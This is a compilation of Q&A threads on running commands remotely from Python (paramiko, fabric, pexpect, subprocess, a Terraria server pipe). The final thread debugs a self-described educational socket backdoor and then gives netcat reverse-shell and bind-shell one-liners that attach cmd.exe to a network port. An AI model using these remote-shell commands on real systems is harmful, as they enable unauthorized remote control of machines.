ssh into aws server and edit hosts file - python

For some reason this seems to infinitely loop, repeatedly printing 'here2' and the output of 'ls -lah'. Is there something bleedingly obvious I'm doing wrong?
My code:
def update_hosts_file(public_dns, hosts_file_info):
    for dns in public_dns:
        print 'here2'
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # won't require saying 'yes' to new fingerprint
        key_path = os.path.join(os.path.expanduser(KEY_DIR), KEY_NAME) + '.pem'
        ssh.connect(dns, username='ubuntu', key_filename=key_path)
        ssh.exec_command('touch testing')
        a, b, c = ssh.exec_command("ls -lah")
        print b.readlines()
        a, b, c = ssh.exec_command("file = open('/home/ubuntu/hosts', 'w')")
        #print b.readlines()
        ssh.exec_command("file.write('127.0.0.1 localhost\n')")
        for tag, ip in hosts_file_info.iteritems():
            ssh.exec_command("file.write('%s %s\n' % (ip,tag))")
        ssh.exec_command("file.close()")
        ssh.close()
public_dns = 'ec2-xx-xxx-xxx-xxx.compute-1.amazonaws.com'
print public_dns
hosts_file_info = {}
#hosts_file_info['1']='test'
#hosts_file_info['2']='test2'
#hosts_file_info['3']='test3'
#print hosts_file_info
update_hosts_file(public_dns,hosts_file_info)

Your first problem is that public_dns is a string, so for dns in public_dns: will iterate over the characters of that string. You'll try the code with 'e', then with 'c', then with '2', and so on. That's not an infinite loop, but it's a loop of length 42, and I could easily see you getting bored and canceling it before that finishes.
If you only want a single server, you still need a list of strings, it's just that the list will only have one string, like this:
public_dns = ['ec2-xx-xxx-xxx-xxx.compute-1.amazonaws.com']
Your next problem is that your ssh code doesn't make any sense. You're trying to execute Python statements, like file = open('/home/ubuntu/hosts', 'w'), as if they were bash commands. In bash, that command is a syntax error, because you can't use parentheses that way in shell scripts. And if you fixed that, it would just be a call to the file command, which would complain about not being able to find a file named =. You could upload a Python script to the remote server and then run it, embed one via a << heredoc, or try to script the interactive Python interpreter, but you can't just run Python code in the bash interpreter.
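For instance, a minimal sketch of the heredoc idea (an assumption-laden illustration, not the asker's code: it assumes ssh is an already-connected SSHClient and that python is on the remote PATH):
remote_script = "python - <<'EOF'\nprint('hello from the remote box')\nEOF\n"
# exec_command runs through the remote shell, so the heredoc feeds the
# script body to the remote Python interpreter's stdin.
stdin, stdout, stderr = ssh.exec_command(remote_script)
print stdout.read()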
On top of that, exec_command starts a command, and immediately returns you the stdin/stdout/stderr channels. It doesn't wait until the command is finished. So, you can't sequence up multiple commands by just doing a,b,c = ssh.exec_command(…) one after another.
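If you do need to run commands in sequence, one common paramiko pattern (a sketch, again assuming a connected SSHClient named ssh) is to block on each command's exit status before issuing the next:
stdin, stdout, stderr = ssh.exec_command('touch testing')
exit_status = stdout.channel.recv_exit_status()  # blocks until the command finishes
if exit_status != 0:
    print 'command failed with status', exit_status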
So, how could you fix this? It really makes more sense to start over again than to try to figure out what each part of this was intended to do and how to make it work.
As far as I can tell, on each machine, you're trying to create a new file whose contents are based only on data you have locally, and the same on all machines. So, why even try to run code on each remote machine to create that file? Just create it locally, once, and upload it to each remote machine, e.g. with Paramiko's sftp. Something like this (obviously untested, because I don't have your data, server credentials, etc.):
hosts = ['127.0.0.1 localhost\n']
for ip, tag in hosts_file_info.iteritems():
    hosts.append('%s %s\n' % (ip, tag))
for dns in public_dns:
    ssh = paramiko.SSHClient()
    # etc. up to connect
    sftp = paramiko.SFTPClient.from_transport(ssh.get_transport())
    f = sftp.open('/home/ubuntu/hosts', 'w')
    f.writelines(hosts)
    f.close()
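If you'd rather build the file on local disk first, paramiko's SFTPClient.put() uploads it in one call. A sketch building on the snippet above (the /tmp/hosts path is a placeholder, not from the question):
# Write the hosts file locally once, then upload the same file to each server.
with open('/tmp/hosts', 'w') as local:
    local.writelines(hosts)
sftp = paramiko.SFTPClient.from_transport(ssh.get_transport())
sftp.put('/tmp/hosts', '/home/ubuntu/hosts')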

You're looping through every letter in the public_dns variable. You probably want something like this:
public_dns = ['ec2-xx-xxx-xxx-xxx.compute-1.amazonaws.com']

Run script to send in-game Terraria server commands

In the past week I installed a Terraria 1.3.5.3 server on Ubuntu 18.04, to play online with friends. This server should be powered on 24/7, without any GUI, and accessed only by SSH on the internal LAN.
My friends asked me if there is a way for them to control the server, e.g. send a message, via the internal in-game chat, so I thought of using a special character ($) in front of the desired command ('$say something' or '$save', for instance) and a Python program that reads the terminal output via a pipe, interprets the command, and sends it back as a bash command.
I followed these instructions to install the server:
https://www.linode.com/docs/game-servers/host-a-terraria-server-on-your-linode
And configured my router to forward a dedicated port to the Terraria server.
All is working fine, but I really struggled to make Python send a command via the "terrariad" bash script described in the link above.
Here is the code used to send a command, in Python:
import subprocess
subprocess.Popen("terrariad save", shell=True)
This works fine, but if I try to input a string with a space in it:
import subprocess
subprocess.Popen("terrariad \"say something\"", shell=True)
it stops the command at the space character, outputting this on the terminal:
: say
Instead of the desired:
: say something
<Server>something
What could I do to solve this problem?
I tried so many things but I get the same result.
P.S. If I send the command manually in the SSH PuTTY terminal, it works!
Edit 1:
I abandoned the Python solution; for now I'll try it with bash instead, which seems a more logical way to do this.
Edit 2:
I found the "terrariad" script expect just one argument, but the Popen is splitting my argument into two no matter the method I use, as my input string has one space char in the middle. Like this:
Expected:
terrariad "say\ something"
$1 = "say something"
But this is what I get from Python's Popen:
subprocess.Popen("terrariad \"say something\"", shell=True)
$1 = "say
$2 = something"
The same happens if I pass it as a list:
subprocess.Popen(["terrariad", "say something"])
$1 = "say
$2 = something"
Or if I use a \ escape before the space character; it always splits the variable when it reaches a space.
Edit 3:
Looking in the bash script I could understand what is going on when I send a command... Basically it uses the command "stuff", from the screen program, to send characters to the terraria screen session:
screen -S terraria -X stuff $send
$send is a printf command:
send="`printf \"$*\r\"`"
And it seems to me that if I run the bash file from Python, it has a different result than running it from the command line. How is this possible? Is this a bug or a bad implementation of the function?
Thanks!
I finally came up with a solution to this, using pipes instead of the Popen approach.
It seems to me that Popen isn't the best solution for running bash scripts, as described in How to do multiple arguments with Python Popen?, the link that SiHa sent in the comments (Thanks!):
"However, using Python as a wrapper for many system commands is not really a good idea. At the very least, you should be breaking up your commands into separate Popens, so that non-zero exits can be handled adequately. In reality, this script seems like it'd be much better suited as a shell script.".
So I came up with this solution, using a fifo file:
First, create a fifo to be used as a pipe, in the desired directory (for instance, /samba/terraria/config):
mkfifo cmdOutput
*/samba/terraria - this is the directory I created in order to easily edit the scripts and save and load maps to the server using another computer; it is shared with samba (https://linuxize.com/post/how-to-install-and-configure-samba-on-ubuntu-18-04/)
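Equivalently, if you prefer to create the fifo from Python, os.mkfifo does the same thing; a sketch using the path from above:
import os

fifo_path = "/samba/terraria/config/cmdOutput"
if not os.path.exists(fifo_path):
    os.mkfifo(fifo_path)  # same effect as the mkfifo shell command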
Then I created a Python script to read the screen output and write to the pipe file (I know, there are probably other ways to do this):
import os

outputFile = os.open("/samba/terraria/config/cmdOutput", os.O_WRONLY)
print("python script has started!")
while 1:
    line = input()
    print(line)
    cmdPosition = line.find("&")
    if cmdPosition != -1:
        cmdText = line[cmdPosition + 1:]  # everything after the command marker
        os.write(outputFile, bytes(cmdText + "\r\r", 'utf-8'))
        os.write(outputFile, bytes("say Command executed!!!\r\r", 'utf-8'))
Then I edited the terraria.service file to call this script, piped from the Terraria server, and redirected errors to another file:
ExecStart=/usr/bin/screen -dmS terraria /bin/bash -c "/opt/terraria/TerrariaServer.bin.x86_64 -config /samba/terraria/config/serverconfig.txt < /samba/terraria/config/cmdOutput 2>/samba/terraria/config/errorLog.txt | python3 /samba/terraria/scripts/allowCommands.py"
*/samba/terraria/scripts/allowCommands.py - where my script is.
**/samba/terraria/config/errorLog.txt - saves a log of errors to a file.
Now I can send commands like 'noon' or 'dawn' to change the in-game time, save the world and back it up with the samba server before boss fights, do other stuff if I have some time XD, and have the terminal showing what is going on with the server.

Incremental stdout out of fabric

I'm new to fabric and want to run a long-running script on a remote computer, so far, I have been using something like this:
import fabric
c = fabric.Connection("192.168.8.16") # blocking
result = c.run("long-running-script-outputing-state-information-into-stdout.py")
Is there a way to read stdout as it comes, asynchronously, instead of using the 'result' object, which can only be used after the command has finished?
If you want to use fabric to do some stuff remotely, you first of all have to follow this structure to make a connection:
@task(hosts=["servername"])
def do_things(c):
    with Connection(host=host, user=user) as c:
        c.run("long-running-script-outputing-state-information-into-stdout.py")
This will print the whole output regardless of what you are doing!
You have to use with Connection(host=host, user=user) as c: to ensure that everything you run executes within that connection context.
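If you specifically want to consume the output incrementally in your own code, here is one sketch. It assumes Fabric 2.x, where Connection.run() forwards keyword arguments such as out_stream to Invoke's runner, which writes to that stream as chunks of remote stdout arrive:
import io
from fabric import Connection

# A file-like object whose write() is invoked as output arrives,
# not only after the command has finished.
class LineEcho(io.StringIO):
    def write(self, data):
        print("chunk:", data, end="")
        return super().write(data)

with Connection("192.168.8.16") as c:
    c.run("long-running-script-outputing-state-information-into-stdout.py",
          out_stream=LineEcho())
Note that by default Fabric already mirrors remote stdout to your terminal as it arrives; the result object is just the after-the-fact summary.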

Python Subprocess SSH closes connection

I have a function that uses the subprocess module to connect to a server via SSH.
# python 3
def foo():
    menu = ["1 = one.com",
            "2 = two.com",
            "3 = three.com"]
    for item in menu:
        print(item)
    choice = input("Which host?: ")
    if choice == "1":
        user = "users-name"
        host = "one.com"
        port = "22"
        subprocess.Popen(['ssh', user + '@' + host, '-p', port])
    elif ...
    ...

foo()
When I run the script, it connects to the server but then terminates the connection after I press any key. It just kind of drops the connection silently and goes back to typing on localhost.
Is subprocess not meant to handle a concurrent connection? I am merely asking it to connect and do nothing else. Advice, tips, suggestions?
There could be multiple answers to this, but assuming your command line, configuration and credentials are all correct and the ssh call on its own would succeed, the problem is the following (also assuming a bit about what happens in the rest of your code, i.e. whether the above example is more or less complete):
You fork and execute ssh (that's what Popen does), but your parent process (the script) continues to run and eventually finishes, and when it does, it also clobbers the child it started, hence dropping you back to your host's console even though you might have seen the other machine's prompt.
If I understand your intention correctly, you can do the following:
child = subprocess.Popen(['ssh', user + '@' + host, '-p', port])
child.wait()
Or just use a different method of starting your ssh, such as check_call(), which hands control over to the child process and waits until it's done.
Hope this helps.
Now that I see the above snippet, I cannot resist giving some unsolicited style advice/hints that can hopefully make your life a bit easier. I would just have a list of choices:
choices = [("one.com", "one_com_user", "one_com_port"), ...]
And generate the menu entries out of that. Based on the input (converted to int), you could use choices[entered] to call ssh with the corresponding arguments from the list, and handle IndexError / out-of-range values with whatever response you want for an unknown value.
That would make your code more concise (no conditional clauses), as well as easier to read and maintain (all hosts information in one place).
And one more thing regarding the ssh call: you can skip concatenating strings and stick to the list of arguments you otherwise already use, replacing ..., user + '@' + host, ... with ..., '-l', user, host, .... That should work with (hopefully) most ssh clients.
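Putting those suggestions together, a hedged sketch (the host/user/port values here are placeholders, not the asker's real ones):
import subprocess

# Table-driven menu: all host information lives in one list of tuples.
choices = [("one.com", "users-name", "22"),
           ("two.com", "other-user", "22"),
           ("three.com", "third-user", "2222")]

for i, (host, user, port) in enumerate(choices, start=1):
    print("%d = %s" % (i, host))

try:
    host, user, port = choices[int(input("Which host?: ")) - 1]
except (ValueError, IndexError):
    print("Unknown choice")
else:
    # check_call() waits for ssh to exit instead of clobbering it.
    subprocess.check_call(['ssh', '-l', user, host, '-p', port])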

python pexpect connected to server how to get the exact output of commands

In Python I am connecting to a different server using
child = pexpect.spawn('ssh username@systemname')
Once it is connected, I would like to execute some other commands. How do I get the exact output of child commands like
child.sendline("hostname")
Or let me know if there is another way to do this.
You may try the following, which will write the output to the mentioned file:
child.sendline('hostname')
child.logfile_read = open("<filename>", 'a')
child.expect('<whatever you expect after the command execution>')
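Another common pattern (a sketch, not from the answer above; the prompt regex is an assumption about the remote shell) is to expect the prompt and read child.before:
import pexpect

child = pexpect.spawn('ssh username@systemname')
child.expect(r'\$ ')            # wait for the remote prompt (assumed to end in '$ ')
child.sendline('hostname')
child.expect(r'\$ ')            # wait for the prompt printed after the command
output = child.before           # everything printed before the matched prompt
print(output.splitlines()[1:])  # the first line is just the echoed 'hostname'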

python subprocess stdin.write a string error 22 invalid argument

I have two Python files communicating over a socket. When I pass the data I received to stdin.write, I get error 22, invalid argument. The code:
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically I want to create something like a backdoor on a system, in a localhost inside a network lab. This is for educational purposes. I have two machines: 1) is running Ubuntu, and I have this code in the server:
import socket, sys

s = socket.socket()
host = "192.168.2.7"  # the server's ip
port = 1234
s.bind((host, port))
s.listen(1)  # wait for client connection.
c, addr = s.accept()  # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
    command_from_user = raw_input("Give your command: ")  # read command from the user
    if command_from_user == 'quit':
        break
    c.send(command_from_user)  # sending the command to client
c.close()  # Close the connection
And I have this code for the client:
import socket
import sys
import subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7"  # ip of the server machine
port = 1234
s.connect((host, port))  # open a TCP connection to hostname on the port
print s.recv(1024)
a = "C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a, universal_newlines=True,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)
while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput = proc.stdout.read() + proc.stderr.read()
s.close  # closing the socket
and the error is in the client file:
Traceback (most recent call last):
  File "ex1client2.py", line 50, in <module>
    proc.stdin.write('%s\n' % data)
ValueError: I/O operation on closed file
Basically I want to run commands one after another from the server on the client and get the output back on the server. The first command is executed; on the second command I get this error message.
The main problem which led me to this solution is with the change-directory command: when I execute cd "path", the directory doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput = proc.stdout.read() + proc.stderr.read()
The problem is that each time through this loop, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
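A minimal sketch of that reader-thread idea (not the asker's full program; the 'dir' command is just an example):
import subprocess
import threading

def drain(pipe, label):
    # Read lines until the pipe closes, so the child never blocks on a full pipe.
    for line in iter(pipe.readline, ''):
        print label, line.rstrip()

proc = subprocess.Popen('cmd.exe', universal_newlines=True,
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE)
for label, pipe in (('OUT:', proc.stdout), ('ERR:', proc.stderr)):
    t = threading.Thread(target=drain, args=(pipe, label))
    t.daemon = True  # don't keep the process alive just for the readers
    t.start()

proc.stdin.write('dir\n')  # send a command; the reader threads print its output
proc.stdin.flush()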
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
    data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
    data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
    s.close()
    for data in f:
        # ... handle one newline-terminated command per iteration ...
One last thing:
OK basically I want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built in; if not, it's probably installable with apt-get install netcat or apt-get install nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu box) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your backdoor server listens forever; you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backdoor client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
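For instance, a hedged sketch of a pipe-reading call without shell=True (the 'dir' command is just an illustration, not from the question):
import subprocess

# Without shell=True, the command is a list: program plus its arguments.
# A bogus program name now raises an OSError at Popen time instead of
# failing obscurely inside the shell.
proc = subprocess.Popen(['cmd.exe', '/c', 'dir'], universal_newlines=True,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
print out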
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).
